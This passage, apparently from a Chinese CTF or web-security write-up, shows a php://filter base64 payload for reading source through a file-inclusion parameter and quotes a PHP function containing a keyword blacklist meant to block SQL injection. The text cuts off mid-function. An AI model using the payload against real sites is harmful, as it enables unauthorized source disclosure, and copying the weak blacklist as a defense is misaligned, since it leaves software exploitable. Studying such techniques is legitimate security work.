看到URL中有:index.php?file=CN
要有利用伪协议的思路:
php://filter/read=convert.base64-encode/resource=index
再结合dirbuster扫描后台得出waf,function,index,config,global,content多个php,了解了该网站的WAF策略:
#function.php
<?php
include './config.php';
function select($sql){
$re = mysql_query($sql);
$arr = array();
while ($row = mysql_fetch_array($re)) {
$arr[] = $row;
}
return $arr;
}
function filtering($str) {
$check= eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|\"', $str);
if($check)
{
echo "非法字符!";
exit();
}
$newstr="";
while($newstr!=$str){
$newstr=$str;
$str = str_replace("script", "", $str);
$str = str_replace("execute", "", $str);
$str = str_replace("update", "", $str);
$str = str_replace("master", "", $str);
$str = str_replace("truncate", "", $str);
$str = str_replace("declare", "", $str);
$str = str_replace("select", "", $str);
$str = str_replace("create", "", $str);
$str = str_replace("delete